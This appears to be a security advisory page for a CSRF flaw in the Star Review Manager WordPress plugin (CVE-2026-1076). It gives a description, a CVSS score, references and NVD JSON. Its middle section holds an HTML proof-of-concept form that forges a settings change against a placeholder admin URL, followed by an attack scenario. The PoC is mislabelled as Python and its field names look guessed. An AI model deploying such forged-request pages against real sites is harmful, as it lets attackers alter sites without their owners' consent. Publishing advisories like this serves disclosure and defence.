CVE-2026-1076

Description

The Star Review Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.2. This is due to missing nonce validation on the settings page. This makes it possible for unauthenticated attackers to update the plugin's CSS settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Star Review Manager plugin for WordPress <= 1.2.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CSRF PoC for CVE-2026-1076 -->
<!-- This PoC demonstrates how an attacker can forge a request to update -->
<!-- Star Review Manager CSS settings without proper nonce validation -->

<!DOCTYPE html>
<html>
<head>
    <title>CSRF PoC - Star Review Manager</title>
</head>
<body>
    <h1>CSRF PoC for CVE-2026-1076</h1>
    <p>Click the button below to trigger the forged request:</p>
    
    <form action="http://target-wordpress-site.com/wp-admin/admin.php?page=star-review-manager-settings" method="POST" id="csrfForm">
        <!-- Required form fields for settings update -->
        <input type="hidden" name="srm_css_custom" value="/* Malicious CSS injected via CSRF */">
        <input type="hidden" name="srm_settings_nonce" value="">
        <input type="hidden" name="srm_save_settings" value="1">
        <!-- Additional hidden fields to complete the request -->
        <input type="hidden" name="srm_star_color" value="red">
        <input type="hidden" name="srm_background_color" value="black">
    </form>
    
    <button type="submit" onclick="this.disabled=true;this.innerText='Submitting...';document.getElementById('csrfForm').submit();">
        Click Here
    </button>
    
    <script>
        // Auto-submit on page load (for demonstration)
        // document.getElementById('csrfForm').submit();
    </script>
</body>
</html>

<!-- Attack Scenario: -->
<!-- 1. Attacker creates a malicious page with the above form -->
<!-- 2. Attacker tricks a logged-in admin to visit the page -->
<!-- 3. Admin clicks the button (or form auto-submits) -->
<!-- 4. Browser sends the request with admin's cookies -->
<!-- 5. Server processes the request without CSRF validation -->
<!-- 6. Plugin CSS settings are updated with attacker's values -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1076
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1076
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1076/
[4] VulDB https://vuldb.com/cve/CVE-2026-1076
[5] https://plugins.trac.wordpress.org/browser/star-review-manager/tags/1.2.2/admin/settings.php#L3
[6] https://plugins.trac.wordpress.org/browser/star-review-manager/trunk/admin/settings.php#L3
[7] https://www.wordfence.com/threat-intel/vulnerabilities/id/54b6a141-eb4c-4cf0-a078-5b3aeda25466?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1076", "sourceIdentifier": "[email protected]", "published": "2026-01-24T08:16:08.140", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Star Review Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.2. This is due to missing nonce validation on the settings page. This makes it possible for unauthenticated attackers to update the plugin's CSS settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}, {"lang": "es", "value": "El plugin Star Review Manager para WordPress es vulnerable a la falsificación de petición en sitios cruzados en todas las versiones hasta la 1.2.2, inclusive. Esto se debe a la falta de validación de nonce en la página de configuración. Esto hace posible que atacantes no autenticados actualicen la configuración CSS del plugin a través de una petición falsificada, siempre que puedan engañar a un administrador del sitio para que realice una acción como hacer clic en un enlace."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/star-review-manager/tags/1.2.2/admin/settings.php#L3", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/star-review-manager/trunk/admin/settings.php#L3", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/54b6a141-eb4c-4cf0-a078-5b3aeda25466?source=cve", "source": "[email protected]"}]}}